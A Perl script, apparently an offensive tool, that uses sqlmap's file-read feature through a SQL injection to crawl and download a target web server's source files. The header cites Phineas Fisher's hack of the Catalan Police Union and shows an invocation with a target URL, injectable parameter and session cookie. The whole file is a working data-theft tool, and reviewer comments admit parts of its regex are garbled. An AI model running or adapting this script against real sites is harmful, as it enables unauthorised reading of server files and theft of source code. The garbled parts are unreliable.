#!/usr/bin/perl -w
## Check out Phineas Fisher's video of the Catalan Police Union
##
## Invoke with:
##
## file_reader.pl "-u http://www.example.com/folder/inc/somepage.php --data 'id=69&idcat=123' --cookie 'PHPSESSID=00deadbeefcafe; val=1234567890' -p=id" /tmp/examplecom/ /var/www/folder/login.php
##
## 1st parameter: SQLMap options
## 2nd parameter: existing folder to save files in
## 3rd parameter: URL to the vulnerable page
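use File::Basename;
use File::Path qw/mkpath/;

# Slurp mode: with $/ undefined, a single read of a handle returns the whole
# file, which lets the reference-matching regex below work on the full text.
undef $/;

# Positional arguments, consumed in order:
#   1. option string handed to sqlmap by download_file (kept as a package
#      variable because that sub reads it by name),
#   2. prefix used below to resolve references that start with "/",
#   3. first remote path to put on the work queue.
our $sqlmap_args = shift @ARGV;
my $webroot = shift @ARGV;
my @files;
push @files, shift @ARGV;

# Work-queue loop: fetch one path, scan the local copy for references to
# other files, and queue every reference that is not already on disk.
while (@files) {
    my $fpath = download_file(pop @files);
    next unless $fpath;

    # SECURITY: $fpath is derived from names extracted from downloaded
    # content, so it is untrusted input. Three-argument open with an explicit
    # read mode treats it strictly as a file name; the two-argument form
    # would let characters in the name select a mode or start a command.
    my $fh;
    unless (open $fh, '<', $fpath) {
        warn "[!] cannot read $fpath: $!\n";
        next;
    }
    my $fcontents = <$fh>;
    close $fh;
    next unless defined $fcontents;

    # Each alternative captures one referenced path. In list context with /g
    # every match yields one slot per capture group, so groups that did not
    # take part come back undefined and are skipped in the loop below.
    # NOTE(review): some alternatives (`['")]`, `(.*?])`, `window\.oper`)
    # look like transcription damage in this listing; they are reproduced
    # unchanged -- confirm against the original file.
    my @new_files = $fcontents =~ /
        require[\s_(].*?['"](.*?)['"]
        |include.*?['"](.*?)['")]
        |load\("(.*?)["?]
        |form.*?action="(.*?)["?]
        |header\("Location:\s(.*?])["?]
        |url:\s"(.*?)["?]
        |window\.oper\("(.*?)["?]
        |window\.Location="(.*?)["?]
    /xg;

    for my $file (@new_files) {
        next unless $file;

        # NOTE(review): this test is garbled in the listing (`/*\//` is not a
        # valid pattern); a leading-slash check is assumed from the two
        # branches: rooted references resolve against $webroot, all others
        # against the directory of the file being scanned.
        if ($file =~ m{^/}) {
            $file = "output/$webroot/$file";
        }
        else {
            $file = dirname($fpath) . "/" . $file;
        }

        # Already downloaded on an earlier pass.
        next if -e $file;

        # The queue holds remote paths, so drop the local "output" prefix.
        $file =~ s/^output//;
        print "[*] adding $file to queue...\n";
        push @files, $file;
    }
}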
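# Fetch one remote file through sqlmap's --file-read option and move the
# saved copy under ./output, mirroring the remote directory layout.
#
# Argument: the remote path to fetch.
# Returns:  the local path of the stored copy, or nothing (bare return) when
#           the name is unusable, sqlmap cannot be run, its output names no
#           saved file, or the move fails.
#
# SECURITY: the name may originate from text scraped out of previously
# downloaded files, so it is handled as untrusted input throughout.
sub download_file {
    my $fname = shift;
    return unless defined $fname && length $fname;

    # Path-traversal guard: resolve "." and ".." segments lexically and
    # refuse any name that would climb above the root, so the local copy
    # can only ever be created beneath "output/".
    my @parts;
    for my $segment (split m{/+}, $fname) {
        next if $segment eq '' || $segment eq '.';
        if ($segment eq '..') {
            return unless @parts;
            pop @parts;
            next;
        }
        push @parts, $segment;
    }
    return unless @parts;
    my $local = 'output/' . join('/', @parts);

    # Command-injection guard: run sqlmap with an argument list instead of a
    # shell command line, so quotes or metacharacters in $fname stay data.
    # The operator-supplied option string is split with shell-like quoting
    # rules; shell expansions inside it are no longer performed.
    our $sqlmap_args;
    require Text::ParseWords;
    my @opts = defined $sqlmap_args
        ? Text::ParseWords::shellwords($sqlmap_args)
        : ();

    my $pid = open(my $pipe, '-|', 'sqlmap', @opts, "--file-read=$fname", '--batch');
    unless ($pid) {
        warn "[!] cannot run sqlmap: $!\n";
        return;
    }
    my $report = do { local $/; <$pipe> };
    close $pipe;
    return unless defined $report;

    # Use the capture only when this match succeeded; after a failed match
    # $1 still holds whatever an earlier, unrelated match left in it.
    my $saved;
    if ($report =~ /files saved to.*?(\/.*?) \(same/s) {
        $saved = $1;
    }
    return unless $saved;

    mkpath(dirname($local));
    unless (rename($saved, $local)) {
        warn "[!] cannot move $saved to $local: $!\n";
        return;
    }
    print "(+] downloaded $fname\n";
    return $local;
}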